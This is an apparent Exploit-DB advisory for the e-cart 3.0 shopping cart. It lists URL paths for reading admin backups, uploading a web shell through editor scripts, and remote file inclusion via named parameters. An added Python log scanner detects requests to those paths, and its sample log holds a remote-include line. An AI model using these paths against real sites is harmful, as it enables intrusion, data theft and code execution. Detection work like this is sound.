Vendor: e-cart 3.0
By: indoushka
CVSS: 9.3 HIGH
Multiple Vulnerabilities
CWE: N/A
Product Name: e-cart 3.0
Affected Version From: e-cart 3.0
Affected Version To: e-cart 3.0
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows SP2 French V.(Pnx2 2.0) + Linux French v.(9.4 Ubuntu)
2008

e-cart 3.0 Multiple Vulnerabilities

e-cart 3.0 is affected by Backup, Upload Shell and remote file inclusion (RFI) vulnerabilities. An attacker can exploit them to gain access to the system and execute malicious code. The Backup vulnerability allows an attacker to access the system's backup files. The Upload Shell vulnerability allows an attacker to upload a malicious file to the system. The RFI vulnerability allows an attacker to inject malicious code into the system.

Mitigation:

The vendor has released a patch to address these vulnerabilities. It is recommended to apply the patch as soon as possible.

Exploit-DB raw data:

========================================================================================                  
| # Title    : e-cart 3.0 Multiple Vulnerabilities                                         |
| # Author   : indoushka                                                               |
| # email    : indoushka@hotmail.com                                                   |
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)       |
| # Web Site : www.iq-ty.com                                                           |
| # Script   : e-cart 3.0                                            |
| # Tested on: Windows SP2 French V.(Pnx2 2.0) + Linux French v.(9.4 Ubuntu)           |
| # Bug      : Multiple Vulnerabilities                                               |
======================      Exploit By indoushka       =================================
| # Exploit  : 
|
| Backup
|
|  1- http://server/e-cart/admin/backups/
|
| Upload Shell
|
|  2- http://server/e-cart/admin/editor/images.php ** to Upload Evil
|  3- http://server/e-cart/admin/editor/image.php  ** to Upload Evil
|  4- http://server/e-cart/images/upload/Evil ** to Find Evil
|
| RFI
|
|  5- http://server/e-cart/admin/includes/application_top.php?language=[EV!L]
|  6- http://server/e-cart/admin/includes/application_top.php?current_page=[EV!L]
|  7- http://server/e-cart/includes/boxes/column_banner.php?language=[EV!L]
|  8- http://server/e-cart/includes/classes/shipping.php?include_modules[i][file]=[EV!L]
|
================================   Dz-Ghost Team   ========================================
Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 |
-------------------------------------------------------------------------------------------
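
An added example (not part of the original advisory or of e-cart's own code): a Python access-log check for requests that touch the paths and parameters listed above, for use while confirming the patch is in place. It assumes Common/Combined Log Format; the finding labels, function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line and status from a Common/Combined Log Format entry.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Include files and parameters listed in the advisory (items 5-8).
RFI_PARAMS = {
    "/admin/includes/application_top.php": re.compile(r"^(language|current_page)$"),
    "/includes/boxes/column_banner.php": re.compile(r"^language$"),
    "/includes/classes/shipping.php": re.compile(r"^include_modules\[[^\]]*\]\[file\]$"),
}
UPLOADERS = ("/admin/editor/images.php", "/admin/editor/image.php")
# Assumption: a value that starts with a URL scheme is never legitimate here.
REMOTE_VALUE = re.compile(r"^\s*[a-z][a-z0-9+.-]*://", re.I)
# Assumption: these extensions are executed by the web server.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.I)

def classify(line):
    """Return the set of advisory-related findings for one access-log line."""
    m = LOG_RE.search(line)
    if not m:
        return set()
    url = urlsplit(m["target"])
    path, findings = url.path, set()
    if "/admin/backups/" in path and m["status"].startswith("2"):
        findings.add("backup-read")            # backup directory served successfully
    if path.endswith(UPLOADERS) and m["method"] == "POST":
        findings.add("editor-upload")          # file posted to the editor upload scripts
    if "/images/upload/" in path and SCRIPT_EXT.search(path):
        findings.add("script-in-upload-dir")   # script requested from the upload directory
    for suffix, name_re in RFI_PARAMS.items():
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if path.endswith(suffix) and name_re.match(name) and REMOTE_VALUE.search(value):
                findings.add("remote-include-value")
    return findings

def scan(lines):
    """Return (line_number, sorted findings) for each line that matched a rule."""
    return [(n, sorted(f)) for n, l in enumerate(lines, 1) if (f := classify(l))]

# Constructed sample log (documentation addresses and hosts, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /e-cart/index.php?language=english HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2024:10:02:11 +0000] "GET /e-cart/admin/backups/ HTTP/1.1" 200 1873',
    '192.0.2.44 - - [01/Jan/2024:10:03:40 +0000] "POST /e-cart/admin/editor/images.php HTTP/1.1" 200 412',
    '192.0.2.44 - - [01/Jan/2024:10:03:55 +0000] "GET /e-cart/images/upload/a.php HTTP/1.1" 200 17',
    '192.0.2.44 - - [01/Jan/2024:10:05:02 +0000] "GET /e-cart/includes/classes/shipping.php?include_modules%5B0%5D%5Bfile%5D=http://files.example/a.txt HTTP/1.1" 200 0',
]
```

Pass any iterable of log lines, for example `scan(open("access.log"))`. Hits on an unpatched install warrant a review of the contents of `admin/backups/` and `images/upload/`.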